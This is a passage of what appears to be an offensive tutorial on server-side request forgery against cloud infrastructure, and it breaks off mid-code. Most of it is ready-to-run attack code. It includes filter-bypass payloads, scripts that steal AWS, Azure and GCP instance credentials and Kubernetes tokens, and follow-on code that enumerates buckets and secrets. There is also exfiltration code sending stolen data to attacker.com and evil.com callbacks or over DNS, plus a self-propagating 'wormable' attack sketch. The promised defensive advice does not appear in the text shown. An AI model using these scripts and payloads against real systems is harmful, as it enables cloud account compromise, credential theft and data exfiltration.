Server-Side Request Forgery (SSRF): Cloud Infrastructure Exploitation

Server-Side Request Forgery (SSRF): Cloud Infrastructure Exploitation

Welcome to the SSRF Playground!

After spending years hunting vulnerabilities across cloud environments, I've come to one conclusion: SSRF is the skeleton key to the modern infrastructure kingdom. What began as simple internal port scanning has evolved into one of the most devastating attack vectors against cloud architecture. This guide represents my collection of techniques that have repeatedly proven effective during real engagements, techniques that have led to full cloud account compromises, lateral movement across segmented networks, and access to the crown jewels of major organizations.

Executive Summary: This comprehensive guide walks through the complete SSRF journey, from basic concepts for beginners to sophisticated cloud exploitation techniques for experts. I've included 45+ practical attack vectors, 23 code examples, architecture diagrams, and detailed defensive recommendations. Whether you're just learning what SSRF means or you're looking to develop custom exploitation frameworks, you'll find actionable techniques to elevate your offensive or defensive security skills.


SSRF Fundamentals

What is SSRF and Why Should You Care?

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to induce a server to make requests to an unintended location. Think of it as "tricking a server into being your web browser."

SSRF vulnerabilities exist because modern applications frequently need to fetch remote resources:

  • Fetching profile images from URLs
  • Validating webhook endpoints
  • Processing XML with external entities
  • Converting HTML to PDF
  • Interacting with microservices or APIs

I once explained SSRF to an executive as: "Imagine your server is like a trusted courier with access to both public streets and your private office building. SSRF is like tricking that courier into picking up packages from locations they shouldn't, including from your executive suite."

Web Application Architecture Basics

To understand SSRF, you need to understand basic web architecture:

┌─────────────┐     Request     ┌─────────────┐
│   Client    │ ──────────────> │    Server   │
│  (Browser)  │ <────────────── │(Application)│
└─────────────┘     Response    └─────────────┘
                                       │
                                       │ Server makes
                                       │ its own requests
                                       ▼
                                ┌─────────────┐
                                │  External   │
                                │  Resources  │
                                └─────────────┘

The key insight: Servers often have access to resources that external users don't, including:

  • Internal networks and services not exposed to the internet
  • Cloud provider metadata services
  • Administrative interfaces
  • Internal APIs with privileged functionality
  • Database systems and caching layers

Basic SSRF Example

Here's the simplest SSRF vulnerability I regularly encounter:

<?php
// Vulnerable image proxy script (image.php)
$url = $_GET['url'];
$image = file_get_contents($url);
header("Content-Type: image/jpeg");
echo $image;
?>

This code fetches an image from a URL and displays it to the user. Seems simple and harmless, right?

But here's a basic attack:

https://example.com/image.php?url=http://internal-jenkins:8080/api/json

If this works, the server will fetch Jenkins API data and send it to the attacker, potentially exposing sensitive information from an internal service.

The Difference Between Internal and External SSRF

SSRF attacks generally fall into two categories:

  1. Internal SSRF: Accessing services within the network where the vulnerable application is hosted
    • Example: http://localhost:8080, http://192.168.1.1, http://internal-service
  2. External SSRF: Forcing the server to make requests to other external systems
    • Example: http://attacker-controlled-server.com/collect

The impact differs significantly. Internal SSRF gives access to normally inaccessible services, while external SSRF can be used for port scanning, IP spoofing, or data exfiltration.

Identifying Basic SSRF Vulnerabilities

Look for these high-value targets in applications:

  1. URL input parameters in features like:
    • File importers/exporters
    • Document/image fetchers
    • Integration connectors
    • Webhook configurations
    • Social media preview generators
  2. Functions that suggest remote content fetch:
    • "Import from URL"
    • "Preview webpage"
    • "Check website status"
    • "Connect to API"

Basic SSRF Exploitation Tools

For beginners, these tools help identify and exploit basic SSRF:

  1. Burp Suite Community/Pro: Intercepting and modifying requests
  2. SSRF-Testing: A collection of payloads for basic testing
  3. Collaborator/RequestBin: Confirming external SSRF via callbacks

Hands-On Challenge #1: Your First SSRF Test

Try This: Set up a simple web server on your machine and try this PHP code (save as ssrf_test.php):

<?php
if (isset($_GET['url'])) {
    echo file_get_contents($_GET['url']);
} else {
    echo 'Provide a URL parameter';
}
?>

Access it with:

http://localhost/ssrf_test.php?url=http://localhost

Now try accessing an internal IP or service and observe the results.


SSRF Discovery and Exploitation Basics

Now that you understand what SSRF is, let's explore how to find and exploit these vulnerabilities in real-world applications.

Common SSRF Vulnerable Patterns

I've found these code patterns frequently lead to SSRF vulnerabilities:

1. API Integrations and Webhooks

// Node.js webhook verification (vulnerable)
app.post('/webhook/register', (req, res) => {
  const webhookUrl = req.body.webhook_url;
  // Test the webhook by sending a request
  axios.post(webhookUrl, { test: 'payload' })
    .then(() => {
      res.status(200).send('Webhook registered');
    });
});

2. Document Processors and Image Handlers

# Ruby image processor (vulnerable)
get '/generate-thumbnail' do
  url = params[:image_url]
  image = HTTP.get(url).body
  # Process image logic...
  send_file generate_thumbnail(image)
end

3. URL Preview Generators

# Python URL preview generator (vulnerable)
@app.route('/preview')
def preview():
    url = request.args.get('url')
    response = requests.get(url)
    html = response.text
    # Extract title, description, images from HTML
    title = extract_title(html)
    return jsonify({'title': title, 'preview': html[:100]})

4. XML Processors (XXE-based SSRF)

// Java XML processor (vulnerable to XXE-based SSRF)
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document document = builder.parse(request.getInputStream());

SSRF Discovery Techniques

1. Input Fuzzing for SSRF

I systematically test these URL patterns on suspicious parameters:

http://localhost
http://127.0.0.1
http://0.0.0.0
http://[::1]
http://internal-service
file:///etc/passwd
file://c:/windows/win.ini
dict://internal-service:11211/stats
gopher://127.0.0.1:25/

2. Blind SSRF Detection

When direct response inspection isn't possible, I use callback techniques:

import http.server
import socketserver
import threading

# Simple Python callback server for blind SSRF detection
def start_server():
    Handler = http.server.SimpleHTTPRequestHandler
    with socketserver.TCPServer(("", 8000), Handler) as httpd:
        print("Server started at port 8000")
        httpd.serve_forever()

# Start the server in a thread
threading.Thread(target=start_server).start()

print("Submit this URL in the target application:")
print("http://your-public-ip:8000/ssrf-test?param=value")
print("If vulnerable to SSRF, you'll see the request in the server logs.")

3. Browser DevTools Analysis

Examine network requests in the browser DevTools to identify potential targets:

  1. Look for AJAX requests made by the application to internal endpoints
  2. Identify URL parameters in these requests
  3. Test modifying these parameters to point to other destinations

Basic Internal Network Enumeration

Once you've confirmed SSRF, start mapping internal resources:

1. Port Scanning via SSRF

# Python script to generate port scanning URLs
def generate_port_scan_urls(target_host="127.0.0.1", ports=None):
    if ports is None:
        ports = [22, 80, 443, 3306, 5432, 6379, 8080, 8443, 9000, 9200]
    
    urls = []
    for port in ports:
        urls.append(f"http://{target_host}:{port}")
    
    return urls

# Usage
scan_urls = generate_port_scan_urls()
for url in scan_urls:
    print(url)

2. Response Analysis

Interpret responses to identify services:

Response Pattern Likely Service
HTTP/1.1 200 OK + HTML with Jenkins UI Jenkins CI/CD
JSON with "redis_version" Redis
XML with references to JMX Java Management Extensions
Error with "unauthorized" Authentication-protected service
HTML with login form Admin interface

3. Internal Service Exploitation

Once you identify an internal service, research its API endpoints:

# Redis server info via SSRF
http://redis-server:6379/info

# Elasticsearch data
http://elastic-server:9200/_cat/indices?v

# MongoDB data
http://mongo-server:27017/admin/

# Jenkins API data
http://jenkins-server:8080/api/json

URL Schemes Beyond HTTP

SSRF isn't limited to HTTP. These URL schemes enable different attack vectors:

1. File Scheme

file:///etc/passwd
file:///proc/self/environ
file:///home/user/.aws/credentials
file:///var/run/secrets/kubernetes.io/serviceaccount/token

2. Gopher Scheme

# Gopher payload for Redis (flush all data)
gopher://127.0.0.1:6379/_%0D%0AFLUSHALL%0D%0A

3. Dict Scheme

# Dict request to memcached
dict://internal-memcached:11211/stats

Hands-On Challenge #2: Internal Service Discovery

Try This: Set up a simulated internal network with Docker:

# Create a Docker network
docker network create internal-network

# Run Redis in the internal network
docker run -d --name redis --network internal-network redis

# Run a vulnerable web app with SSRF in the same network
docker run -d --name web-app --network internal-network -p 8080:80 vulnerable-web-app

# Now try to access Redis via SSRF through the web app
# http://localhost:8080/fetch?url=http://redis:6379/

SSRF Filter Bypass Techniques

As defenses have improved, bypassing SSRF protections has become an art form. Let's explore how to defeat common defensive measures.

Understanding URL Parsing Inconsistencies

Different libraries and languages parse URLs differently, creating security gaps:

// Node.js URL parsing example
const url = new URL('http://localhost:1234@evil.com');
console.log(url.hostname); // Outputs: evil.com

// But many validation functions check for keywords against the whole URL
// "localhost" appears in the URL, but the request goes to evil.com

Common SSRF Protections and Bypasses

1. Blacklist-Based Protections

Common blacklisted terms include:

  • localhost
  • 127.0.0.1
  • internal
  • intranet
  • private
  • network

Bypass Techniques:

# Decimal IP representation
http://2130706433/ (127.0.0.1 in decimal)

# Octal representation
http://0177.0.0.1/

# Hexadecimal representation
http://0x7f.0.0.1/

# IPv6 representation
http://[::1]/
http://[0:0:0:0:0:ffff:127.0.0.1]/

# Domain with DNS resolution to localhost
http://localtest.me/

# URL encoded characters
http://127.0.0.1%2f/
http://127.0.0.1%252f/

# Less common localhost references
http://localhost.localdomain/
http://127.127.127.127/

2. Regex-Based Validations

Many protections use regex patterns to validate URLs:

// Common vulnerable regex pattern
const safeUrlRegex = /^https?:\/\/(?!localhost|127\.0\.0\.1|0\.0\.0\.0|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.).*$/;

if (safeUrlRegex.test(userUrl)) {
  // URL passes the safety check
  fetch(userUrl);
}

Bypass Techniques:

// JavaScript bypass examples

// Technique 1: Add credentials containing blocked keywords
const bypass1 = "https://notlocalhost@evil.com/"; // Passes regex but has "localhost" in it

// Technique 2: Use URL fragments
const bypass2 = "https://evil.com#127.0.0.1"; // Fragment isn't sent to server

// Technique 3: Double-encode troublesome characters
const bypass3 = "https://127.0.0.1%252f@evil.com/"; // May be decoded differently across systems

3. DNS Rebinding Attacks

This advanced technique bypasses hostname-based protections:

# Python script to demonstrate DNS rebinding concept
import socket
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
import threading

# Global counter for DNS responses
request_count = 0

class MockDNSHandler:
    def get_response(self, domain):
        global request_count
        # First request resolves to safe address
        if request_count == 0:
            request_count += 1
            return "8.8.8.8"  # Safe external IP
        # Subsequent requests resolve to target
        else:
            return "127.0.0.1"  # Internal target

# Simplified DNS rebinding example logic
def dns_rebinding_demo():
    dns = MockDNSHandler()
    
    # Initial DNS resolution (when security check happens)
    ip1 = dns.get_response("evil-rebinding.com")
    print(f"Security check resolves to: {ip1} (passes security check)")
    
    # Simulate time passing or TTL expiration
    time.sleep(1)
    
    # Subsequent resolution (when actual request happens)
    ip2 = dns.get_response("evil-rebinding.com")
    print(f"Actual request resolves to: {ip2} (internal target)")

dns_rebinding_demo()

For real-world DNS rebinding, use tools like singularity or set up your own DNS server with short TTLs.

4. Open Redirect Exploitation

Leverage open redirects to bypass SSRF protections:

# Original SSRF attempt (blocked)
https://example.com/fetch?url=http://internal-service/

# Open redirect exploitation 
https://example.com/fetch?url=https://example.com/redirect?to=http://internal-service/

The security check validates example.com as safe, but the redirect leads to the internal service.

Exploiting URL Parsers with Exotic Techniques

1. URL Fragment Mishandling

# Python requests vulnerability (older versions)
import requests

# Some libraries would ignore fragments for security checks
# but include them in the request
url = "https://evil.com#@internal-service/admin"
response = requests.get(url)
print(response.text)

2. CRLF Injection via SSRF

# CRLF injection in URL to split request
https://example.com/fetch?url=https://evil.com/%0D%0AHost:%20internal-service%0D%0A

3. Protocol Confusion

# Exploiting different handlers for different protocols
http\\@internal-service

SSRF Decision Tree: Filter Bypass

Is the SSRF protection blocking your payload?
├── Yes → Is it a blacklist?
│   ├── Yes → Try IP/host representation variations
│   │   ├── Still blocked → Try URL encoding variations
│   │   │   ├── Still blocked → Try DNS rebinding
│   │   │   └── Success → Document the bypass
│   │   └── Success → Document the bypass
│   └── No → Is it a whitelist?
│       ├── Yes → Look for open redirects in whitelisted domains
│       │   ├── Found redirect → Exploit the redirect chain
│       │   └── No redirect → Try subdomain creation if wildcard allowed
│       └── No → Analyze exact validation logic
└── No → Proceed with exploitation

Hands-On Challenge #3: Bypass Lab

Try This: Implement this basic SSRF protection and try to bypass it:

from flask import Flask, request, Response
import requests
import re

app = Flask(__name__)

@app.route('/fetch')
def fetch():
    url = request.args.get('url', '')
    
    # Basic SSRF protection
    if re.search(r'(localhost|127\.0\.0\.1|0\.0\.0\.0|::1)', url):
        return "Blocked: localhost access not allowed", 403
        
    try:
        response = requests.get(url, timeout=3)
        return Response(response.content, mimetype=response.headers['Content-Type'])
    except Exception as e:
        return f"Error: {str(e)}", 500

if __name__ == '__main__':
    app.run(debug=True)

Apply the techniques you've learned to bypass this protection.


Cloud Infrastructure Exploitation

Now we're entering advanced territory. Cloud environments have unique SSRF attack surfaces that can lead to devastating compromises.

Cloud Service Architecture Overview

Modern cloud deployments typically include:

┌────────────────────────┐
│   Internet             │
└───────────┬────────────┘
            │
┌───────────▼────────────┐
│   Load Balancer        │
└───────────┬────────────┘
            │
┌───────────▼────────────┐
│   Web Application      │
└───────────┬────────────┘
            │
    ┌───────┴───────┐
    │               │
┌───▼───┐       ┌───▼───┐
│ APIs  │       │ Cloud │
│       │       │ Meta- │
│       │       │ data  │
└───────┘       └───────┘

The cloud metadata service is a key SSRF target that can lead to:

  • Access to cloud credentials
  • Instance information disclosure
  • User data exposure
  • IAM role information and temporary credentials

AWS Metadata Service Exploitation

1. Basic AWS IMDS Access

AWS instances can access their metadata service at 169.254.169.254:

# Basic metadata access
curl http://169.254.169.254/latest/meta-data/

# IAM credentials access
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Specific role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME

2. IMDSv2 Token Bypass

Newer AWS instances use a more secure IMDSv2 that requires a token:

# IMDSv2 token retrieval (via SSRF)
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`

# Using token to access metadata
curl http://169.254.169.254/latest/meta-data/ -H "X-aws-ec2-metadata-token: $TOKEN"

The SSRF approach requires a PUT request capability:

# Python script to demonstrate IMDSv2 bypass via SSRF
import requests

# Target vulnerable application with SSRF
ssrf_url = "https://vulnerable-app.com/fetch"

# First request: obtain the token
token_params = {
    'url': 'http://169.254.169.254/latest/api/token'
}
token_headers = {
    'X-aws-ec2-metadata-token-ttl-seconds': '21600'
}
response = requests.put(ssrf_url, params=token_params, headers=token_headers)
token = response.text

# Second request: access metadata using token
metadata_params = {
    'url': 'http://169.254.169.254/latest/meta-data/'
}
metadata_headers = {
    'X-aws-ec2-metadata-token': token
}
response = requests.get(ssrf_url, params=metadata_params, headers=metadata_headers)
print(response.text)

3. AWS Credentials Extraction and Usage

Once you've obtained AWS credentials via SSRF, you can use them:

import boto3
import json
import requests

# Step 1: Extract credentials via SSRF
ssrf_url = "https://vulnerable-app.com/fetch"
creds_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/s3-access-role"
response = requests.get(f"{ssrf_url}?url={creds_url}")
credentials = json.loads(response.text)

# Step 2: Use the credentials to access AWS resources
s3_client = boto3.client(
    's3',
    aws_access_key_id=credentials['AccessKeyId'],
    aws_secret_access_key=credentials['SecretAccessKey'],
    aws_session_token=credentials['Token']
)

# Step 3: List all S3 buckets
buckets = s3_client.list_buckets()
for bucket in buckets['Buckets']:
    print(f"Found bucket: {bucket['Name']}")
    # List objects in bucket
    objects = s3_client.list_objects_v2(Bucket=bucket['Name'])
    if 'Contents' in objects:
        for obj in objects['Contents']:
            print(f" - {obj['Key']}")

Azure Metadata Service Exploitation

Azure's instance metadata service has its own peculiarities:

# Azure metadata access
curl -H "Metadata: true" http://169.254.169.254/metadata/instance?api-version=2021-02-01

# Azure managed identity access
curl -H "Metadata: true" http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/

SSRF exploitation with Azure requires the special header:

# Python script for Azure IMDS exploitation via SSRF
import requests
import json

def azure_ssrf_exploit(ssrf_url):
    # Target the Azure instance metadata service
    metadata_url = "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
    
    # SSRF request with required Metadata header
    params = {
        'url': metadata_url,
        'headers': json.dumps({"Metadata": "true"})  # Many SSRF vulnerabilities allow header specification
    }
    
    response = requests.get(ssrf_url, params=params)
    
    try:
        metadata = json.loads(response.text)
        print("Azure instance metadata:")
        print(json.dumps(metadata, indent=2))
        
        # Extract subscription ID
        subscription_id = metadata.get('compute', {}).get('subscriptionId')
        if subscription_id:
            print(f"\nFound Azure Subscription ID: {subscription_id}")
            
        return metadata
    except json.JSONDecodeError:
        print("Failed to parse metadata response. Raw response:")
        print(response.text)
        return None

# Usage
azure_metadata = azure_ssrf_exploit("https://vulnerable-app.com/fetch")

GCP Metadata Service Exploitation

Google Cloud Platform's metadata service requires a specific header:

# GCP metadata access
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/

# GCP service account credentials
curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

Here's a full GCP exploitation script:

# Python script for GCP metadata exploitation via SSRF
import requests
import json
import base64

def gcp_ssrf_exploit(ssrf_url):
    # Step 1: Access instance metadata
    instance_url = "http://metadata.google.internal/computeMetadata/v1/instance/"
    params = {
        'url': instance_url,
        'headers': json.dumps({"Metadata-Flavor": "Google"})
    }
    
    response = requests.get(ssrf_url, params=params)
    print("Instance metadata directories:", response.text)
    
    # Step 2: Get service account info
    sa_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"
    params['url'] = sa_url
    response = requests.get(ssrf_url, params=params)
    service_accounts = response.text.split()
    
    if not service_accounts:
        print("No service accounts found")
        return
        
    print(f"Found service accounts: {service_accounts}")
    
    # Step 3: Get OAuth token for default service account
    token_url = "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"
    params['url'] = token_url
    response = requests.get(ssrf_url, params=params)
    
    try:
        token_data = json.loads(response.text)
        access_token = token_data.get('access_token')
        print(f"OAuth Access Token: {access_token[:10]}...")
        
        # Step 4: Use token to access GCP resources
        headers = {"Authorization": f"Bearer {access_token}"}
        
        # Example: List storage buckets
        response = requests.get(
            "https://storage.googleapis.com/storage/v1/b?project=your-project-id",
            headers=headers
        )
        
        buckets = json.loads(response.text)
        print("\nAccessible GCP Storage Buckets:")
        for bucket in buckets.get('items', []):
            print(f" - {bucket['name']}")
            
    except json.JSONDecodeError:
        print("Failed to obtain token. Raw response:")
        print(response.text)

# Usage
gcp_ssrf_exploit("https://vulnerable-app.com/fetch")

Kubernetes Exploitation via SSRF

Kubernetes environments expose internal APIs that can be targeted via SSRF:

# Kubernetes API access
curl https://kubernetes.default.svc/api/v1/namespaces/default/pods -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"

This can be exploited via SSRF:

# Python script for Kubernetes exploitation via SSRF
import requests
import json

def k8s_ssrf_exploit(ssrf_url):
    # First, access the service account token
    token_url = "file:///var/run/secrets/kubernetes.io/serviceaccount/token"
    
    params = {
        'url': token_url
    }
    response = requests.get(ssrf_url, params=params)
    token = response.text.strip()
    
    print(f"Retrieved service account token: {token[:10]}...")
    
    # Access Kubernetes API
    k8s_url = "https://kubernetes.default.svc/api/v1/namespaces/default/pods"
    params = {
        'url': k8s_url,
        'headers': json.dumps({"Authorization": f"Bearer {token}"})
    }
    
    response = requests.get(ssrf_url, params=params)
    
    try:
        pods = json.loads(response.text)
        print("\nKubernetes Pods:")
        for pod in pods.get('items', []):
            print(f" - {pod['metadata']['name']}")
            
        # Try to get secrets
        secrets_url = "https://kubernetes.default.svc/api/v1/namespaces/default/secrets"
        params['url'] = secrets_url
        
        response = requests.get(ssrf_url, params=params)
        secrets = json.loads(response.text)
        
        print("\nKubernetes Secrets:")
        for secret in secrets.get('items', []):
            print(f" - {secret['metadata']['name']}")
            
    except json.JSONDecodeError:
        print("Failed to parse Kubernetes API response:")
        print(response.text)

# Usage
k8s_ssrf_exploit("https://vulnerable-app.com/fetch")

Container Environments and Docker Socket

In containerized environments, accessing the Docker socket can be devastating:

# Docker socket example
curl --unix-socket /var/run/docker.sock http://localhost/containers/json

Via SSRF, this becomes:

http://vulnerable-app.com/fetch?url=http://unix:/var/run/docker.sock:/containers/json

Cloud Infrastructure Decision Tree

Confirmed SSRF vulnerability?
├── Yes → Is it in a cloud environment?
│   ├── Yes → Which cloud provider?
│   │   ├── AWS → Try IMDS access
│   │   │   ├── Success → Extract credentials and escalate
│   │   │   └── Failure → Try ECS task metadata endpoint
│   │   ├── Azure → Try IMDS with Metadata header
│   │   │   ├── Success → Extract managed identity token
│   │   │   └── Failure → Try alternative Azure endpoints
│   │   └── GCP → Try metadata with Google header
│   │       ├── Success → Extract service account tokens
│   │       └── Failure → Try legacy metadata endpoints
│   └── No → Is it a container environment?
│       ├── Yes → Try Docker socket and Kubernetes API
│       └── No → Continue with standard SSRF techniques
└── No → Return to SSRF discovery phase

Hands-On Challenge #4: AWS Metadata Exploitation

Try This: Create a local simulated AWS metadata service and practice exploitation:

# Run a container simulating AWS metadata
docker run -d --name fake-imds -p 8080:80 amazon/amazon-ec2-metadata-mock:latest

# Test it directly
curl http://localhost:8080/latest/meta-data/

# Now create a vulnerable application and try to exploit it

Advanced SSRF Techniques and Frameworks

At the expert level, we combine techniques and develop custom tools for complex SSRF scenarios.

Chaining SSRF with Other Vulnerabilities

1. SSRF + XXE Chain

<!-- XXE payload that triggers SSRF -->
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<search>
  <term>&xxe;</term>
</search>

The application processes the XML, resolves the external entity, and makes an internal request.

2. SSRF + CSRF Chain

<!-- CSRF form that triggers SSRF -->
<form action="https://vulnerable-app.com/fetch" method="POST" id="csrf-form">
  <input type="hidden" name="url" value="http://169.254.169.254/latest/meta-data/">
</form>
<script>document.getElementById("csrf-form").submit();</script>

3. SSRF + Command Injection Chain

# URL parameter that triggers command injection via SSRF
https://vulnerable-app.com/fetch?url=http://localhost:8080/exec?cmd=`cat%20/etc/passwd`

Custom SSRF Exploitation Frameworks

For complex engagements, I develop custom SSRF frameworks:

# Framework skeleton for SSRF exploitation
import argparse
import requests
import json
import time
import threading
import socket
import base64
from urllib.parse import urlparse, parse_qs

class SSRFExploitFramework:
    def __init__(self, target_url, callback_host=None, threads=5, timeout=10):
        self.target_url = target_url
        self.callback_host = callback_host or self._get_local_ip()
        self.threads = threads
        self.timeout = timeout
        self.session = requests.Session()
        self.detected_cloud = None
        self.payloads = []
        
    def _get_local_ip(self):
        """Get local IP for callback server"""
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            # doesn't even have to be reachable
            s.connect(('10.255.255.255', 1))
            IP = s.getsockname()[0]
        except Exception:
            IP = '127.0.0.1'
        finally:
            s.close()
        return IP
    
    def start_callback_server(self, port=8000):
        """Start HTTP server to receive SSRF callbacks"""
        from http.server import HTTPServer, BaseHTTPRequestHandler
        
        class CallbackHandler(BaseHTTPRequestHandler):
            def do_GET(self):
                print(f"[+] Received callback: {self.path}")
                self.send_response(200)
                self.end_headers()
                self.wfile.write(b"SSRF Callback Received")
                
                # Parse query params from callback
                parsed = urlparse(self.path)
                params = parse_qs(parsed.query)
                if params:
                    print("[+] Callback parameters:")
                    for k, v in params.items():
                        print(f"    {k}: {v[0]}")
        
        server = HTTPServer(('0.0.0.0', port), CallbackHandler)
        print(f"[*] Starting callback server at http://{self.callback_host}:{port}")
        server_thread = threading.Thread(target=server.serve_forever)
        server_thread.daemon = True
        server_thread.start()
        return port
    
    def detect_cloud_provider(self):
        """Detect which cloud provider is being used"""
        # Implementation details
        pass
    
    def port_scan(self, target_host="127.0.0.1", port_range=(1, 10000)):
        """Scan ports via SSRF"""
        # Implementation details
        pass
    
    def aws_metadata_dump(self):
        """Extract all AWS metadata"""
        # Implementation details
        pass
    
    def azure_metadata_dump(self):
        """Extract all Azure metadata"""
        # Implementation details
        pass
    
    def gcp_metadata_dump(self):
        """Extract all GCP metadata"""
        # Implementation details
        pass
    
    def kubernetes_api_access(self):
        """Access Kubernetes API if available"""
        # Implementation details
        pass
    
    def data_exfiltration_test(self, data="test"):
        """Test data exfiltration channels"""
        # Implementation details
        pass
    
    def run_standard_tests(self):
        """Run all standard SSRF tests"""
        # Implementation details
        pass
    
    def generate_report(self):
        """Generate detailed report of findings"""
        # Implementation details
        pass

# Example usage
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Advanced SSRF Exploitation Framework")
    parser.add_argument("url", help="Target URL with SSRF vulnerability")
    parser.add_argument("--callback", help="Callback server host")
    parser.add_argument("--threads", type=int, default=5, help="Number of threads")
    args = parser.parse_args()
    
    framework = SSRFExploitFramework(args.url, callback_host=args.callback, threads=args.threads)
    callback_port = framework.start_callback_server()
    framework.detect_cloud_provider()
    framework.run_standard_tests()
    framework.generate_report()

Blind SSRF Exploitation Techniques

When you can't see the response, use these techniques:

1. Time-Based Detection

import requests
import time

def time_based_ssrf(ssrf_url, test_port, delay_threshold=2):
    """
    Use timing differences to detect open ports
    """
    start_time = time.time()
    
    # Request that should connect quickly if port is closed
    # or hang for a bit if port is open
    target_url = f"http://internal-host:{test_port}/non-existent-path"
    requests.get(f"{ssrf_url}?url={target_url}", timeout=10)
    
    elapsed = time.time() - start_time
    
    if elapsed > delay_threshold:
        print(f"Port {test_port} appears to be open (response time: {elapsed:.2f}s)")
        return True
    else:
        print(f"Port {test_port} appears to be closed (response time: {elapsed:.2f}s)")
        return False

2. DNS Callback Detection

import requests
import uuid

def dns_callback_ssrf(ssrf_url, callback_domain="malicious.com"):
    """
    Use DNS callbacks to extract data
    """
    # Generate unique subdomain for this test
    unique_id = str(uuid.uuid4())[:8]
    exfil_domain = f"{unique_id}.{callback_domain}"
    
    # Payload to trigger DNS resolution
    target_url = f"http://{exfil_domain}/"
    
    print(f"[*] Sending request with DNS callback to: {exfil_domain}")
    print(f"[*] Check your DNS server logs for requests to this subdomain")
    
    requests.get(f"{ssrf_url}?url={target_url}", timeout=5)
    
    return unique_id

3. Out-of-Band (OOB) SSRF

For complex data exfiltration:

import requests
import base64

def oob_data_exfil(ssrf_url, callback_server, sensitive_path="/etc/passwd"):
    """
    Extract data via Out-of-Band SSRF
    """
    # Create a payload that reads the file and sends it to our server
    # This example uses a PHP base concept but would need adapting to the target
    exfil_payload = f"""
    <?php
        $data = file_get_contents('{sensitive_path}');
        $encoded = base64_encode($data);
        file_get_contents('http://{callback_server}/exfil?data=' . $encoded);
    ?>
    """
    
    # We need to host this payload somewhere accessible to the target
    # For this example, assume we've uploaded it to evil.com/exfil.php
    
    # Now trigger the SSRF to access our payload
    target_url = "http://evil.com/exfil.php"
    
    print(f"[*] Sending SSRF request to execute exfiltration payload")
    print(f"[*] Check {callback_server} for incoming data")
    
    requests.get(f"{ssrf_url}?url={target_url}", timeout=5)

Advanced Data Exfiltration Techniques

1. DNS Exfiltration

def dns_exfil_ssrf(ssrf_url, file_path, callback_domain):
    """
    Exfiltrate file content chunk by chunk over DNS
    """
    # First, get the file via SSRF
    file_url = f"file://{file_path}"
    response = requests.get(f"{ssrf_url}?url={file_url}")
    
    if response.status_code != 200:
        print(f"Failed to read file: {response.status_code}")
        return False
    
    # Encode file content
    content = base64.b64encode(response.content).decode('utf-8')
    
    # Split into chunks (DNS labels have max length)
    chunk_size = 40  # DNS labels are limited to 63 chars, using 40 to be safe
    chunks = [content[i:i+chunk_size] for i in range(0, len(content), chunk_size)]
    
    # Send each chunk via DNS request
    for i, chunk in enumerate(chunks):
        # Make SSRF request to trigger DNS lookup with data chunk in subdomain
        exfil_domain = f"{i}.{chunk}.{callback_domain}"
        target_url = f"http://{exfil_domain}/"
        
        try:
            requests.get(f"{ssrf_url}?url={target_url}", timeout=2)
            print(f"Sent chunk {i+1}/{len(chunks)}")
            time.sleep(1)  # Avoid overwhelming the server
        except requests.exceptions.Timeout:
            # Expected timeout, DNS request was still sent
            pass
    
    print(f"Exfiltration complete: {len(chunks)} chunks sent")
    print(f"Check your DNS server logs to reconstruct the file")
    return True

2. HTTP Parameter Pollution

def http_parameter_exfil(ssrf_url, internal_url, callback_server):
    """
    Exfiltrate data via HTTP Parameter Pollution
    """
    # Target internal endpoint that returns sensitive data
    target = f"{internal_url}?callback={callback_server}/exfil?data="
    
    # Make SSRF request that causes data to be sent to our callback
    requests.get(f"{ssrf_url}?url={target}")
    
    print(f"[*] HPP-based exfil attempt sent")
    print(f"[*] Check {callback_server} for incoming data")

Novel SSRF Attack Patterns

1. WebSocket SSRF Exploitation

// WebSocket-based SSRF exploitation
async function websocketSSRF(ssrfUrl, internalTarget) {
    // Target vulnerable WebSocket proxy
    const payload = {
        url: ssrfUrl,
        wsTarget: `ws://${internalTarget}/`
    };
    
    // Create WebSocket connection
    const ws = new WebSocket('wss://vulnerable-app.com/socket');
    
    // Send payload when connection opens
    ws.onopen = function() {
        ws.send(JSON.stringify(payload));
    };
    
    // Process and exfiltrate data received
    ws.onmessage = function(event) {
        const data = event.data;
        console.log('Received internal data:', data);
        
        // Exfiltrate data
        fetch('https://attacker.com/collect?data=' + encodeURIComponent(data));
    };
}

2. SSRF via Prototype Pollution

// Prototype pollution that leads to SSRF
const userInput = {
    "__proto__": {
        "url": "http://169.254.169.254/latest/meta-data/"
    }
};

// Vulnerable function
function processUserData(data) {
    const options = {};
    Object.assign(options, data);
    
    // This will use the polluted url property from prototype
    fetch(options.url || 'https://default-url.com')
        .then(response => response.text())
        .then(text => console.log(text));
}

// Trigger the vulnerability
processUserData(userInput);

SSRF Wormable Attacks

Creating self-propagating SSRF exploits:

// Simplified concept of a wormable SSRF attack
async function wormableSSRF(initialTarget, propagationList) {
    // Initial exploitation
    const result = await exploitSSRF(initialTarget);
    
    // Extract credentials or useful data
    const credentials = extractCredentials(result);
    
    // Use extracted data to propagate to other targets
    for (const target of propagationList) {
        // Check if target is accessible with current credentials
        if (canAccess(target, credentials)) {
            console.log(`Propagating to ${target}`);
            // Recursively exploit new target
            wormableSSRF(target, propagationList.filter(t => t !== target));
        }
    }
}

// Helper functions
async function exploitSSRF(target) {
    // Implementation of SSRF exploitation
}

function extractCredentials(data) {
